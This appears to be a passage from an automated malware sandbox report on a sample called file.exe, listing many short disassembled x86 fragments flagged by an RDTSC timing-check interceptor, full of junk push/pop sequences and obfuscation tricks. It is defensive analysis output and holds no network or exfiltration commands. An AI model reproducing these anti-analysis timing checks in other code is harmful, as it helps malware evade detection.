Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C35568 second address: C355B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 2FE5AB11h 0x0000000e sub dword ptr [ebp+122D33F4h], ebx 0x00000014 push 00000003h 0x00000016 or dword ptr [ebp+122D2FB2h], esi 0x0000001c push 00000000h 0x0000001e mov di, D026h 0x00000022 push 00000003h 0x00000024 pushad 0x00000025 jl 00007F68950E7988h 0x0000002b mov ah, 94h 0x0000002d mov eax, dword ptr [ebp+122D28EFh] 0x00000033 popad 0x00000034 call 00007F68950E7989h 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F68950E798Bh 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C355B3 second address: C3561D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jg 00007F68950EC3B6h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F68950EC3C7h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push edx 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edx 0x00000022 pop edx 0x00000023 mov eax, dword ptr [eax] 0x00000025 jmp 00007F68950EC3C5h 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jo 00007F68950EC3B6h 0x00000037 jmp 00007F68950EC3C0h 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3561D second address: C3564F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E798Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov cx, ax 0x0000000d mov edx, dword ptr [ebp+122D30F4h] 0x00000013 lea ebx, dword ptr [ebp+12457074h] 0x00000019 add dword ptr [ebp+122D278Dh], edx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jng 00007F68950E7988h 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52737 second address: C52751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F68950EC3C3h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52751 second address: C52755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52755 second address: C5275B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5275B second address: C5278D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7999h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F68950E7992h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52BA3 second address: C52BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3BDh 0x00000009 popad 0x0000000a js 00007F68950EC3CAh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52BBF second address: C52BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52BC3 second address: C52BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52D0A second address: C52D14 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52D14 second address: C52D27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jo 00007F68950EC3B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52FF6 second address: C53014 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jl 00007F68950E7986h 0x00000013 pop esi 0x00000014 popad 0x00000015 je 00007F68950E7996h 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53572 second address: C53577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53577 second address: C5357C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5357C second address: C53584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5373A second address: C5373E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5373E second address: C5374E instructions: 0x00000000 rdtsc 0x00000002 je 00007F68950EC3B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5374E second address: C53754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53754 second address: C53771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C539E6 second address: C53A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E798Ch 0x00000007 jmp 00007F68950E7991h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53F9D second address: C53FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3BDh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C543DB second address: C543DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C546A6 second address: C546AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C546AC second address: C546B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C577E9 second address: C577EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C577EE second address: C577F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B626 second address: C5B633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B633 second address: C5B639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BA7E second address: C5BA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BA83 second address: C5BAA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7998h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BBE2 second address: C5BBE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5ABCF second address: C5ABD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60130 second address: C60144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950EC3C0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C602A6 second address: C602AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C602AA second address: C602D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C602D0 second address: C602DF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jne 00007F68950E7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C602DF second address: C602F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6042A second address: C60430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60430 second address: C60434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60434 second address: C6043E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60590 second address: C6059E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F68950EC3B6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6059E second address: C605C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F68950E7986h 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007F68950E7986h 0x00000012 jmp 00007F68950E798Ah 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a popad 0x0000001b push esi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6088C second address: C608A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F68950EC3C7h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C608A8 second address: C608AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C608AE second address: C608B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60BB0 second address: C60BCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F68950E7998h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C634ED second address: C634F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C634F1 second address: C63502 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C639C0 second address: C639C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C639C4 second address: C639CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63A94 second address: C63AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F68950EC3BFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63AA8 second address: C63ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jp 00007F68950E7998h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63ABA second address: C63ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64073 second address: C64079 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64079 second address: C640A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jc 00007F68950EC3BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C640A2 second address: C640A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C640A6 second address: C64127 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F68950EC3B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 call 00007F68950EC3BBh 0x00000027 jnp 00007F68950EC3C2h 0x0000002d call 00007F68950EC3BBh 0x00000032 pop esi 0x00000033 pop esi 0x00000034 adc di, B235h 0x00000039 push 00000000h 0x0000003b or esi, dword ptr [ebp+122D363Dh] 0x00000041 push 00000000h 0x00000043 jbe 00007F68950EC3BEh 0x00000049 push esi 0x0000004a xor dword ptr [ebp+122D2885h], ecx 0x00000050 pop esi 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F68950EC3C5h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C648A1 second address: C648AB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C648AB second address: C648B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C652CB second address: C652CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C648B0 second address: C648B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C65B2D second address: C65B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C664AD second address: C664B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C664B3 second address: C664B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C688D3 second address: C688DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F68950EC3B6h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C688DE second address: C688FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950E7999h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C688FB second address: C688FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C688FF second address: C6890B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6890B second address: C68911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C68911 second address: C68915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69B6D second address: C69B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69B73 second address: C69B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E4FE second address: C6E503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72E48 second address: C72E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72E4C second address: C72E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72E50 second address: C72E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73E25 second address: C73E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7303A second address: C73045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73E29 second address: C73E3B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F68950EC3BAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73045 second address: C73059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007F68950E7986h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73E3B second address: C73E4C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73E4C second address: C73E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73129 second address: C7312D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73FA4 second address: C74026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F68950E7988h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 pushad 0x00000013 mov edx, dword ptr [ebp+122D35B9h] 0x00000019 popad 0x0000001a mov bh, 63h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+1245DA56h], esi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 js 00007F68950E798Ch 0x00000036 or dword ptr [ebp+122D2914h], esi 0x0000003c mov eax, dword ptr [ebp+122D1689h] 0x00000042 mov ebx, 70277ED7h 0x00000047 push FFFFFFFFh 0x00000049 sub dword ptr [ebp+122D328Dh], edi 0x0000004f nop 0x00000050 pushad 0x00000051 jmp 00007F68950E7992h 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 jmp 00007F68950E7993h 0x0000005e popad 0x0000005f popad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D81 second address: C74D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950EC3BBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74026 second address: C7402C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75CE2 second address: C75CE8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76B00 second address: C76B4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F68950E7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F68950E7988h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 stc 0x00000028 push 00000000h 0x0000002a add ebx, dword ptr [ebp+122D2ED9h] 0x00000030 push 00000000h 0x00000032 jmp 00007F68950E7990h 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74E5C second address: C74E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76B4D second address: C76B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C77A6D second address: C77A72 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76D75 second address: C76D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C78BF6 second address: C78BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C7AB0E second address: C7AB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C7AB12 second address: C7AB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C78D15 second address: C78D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
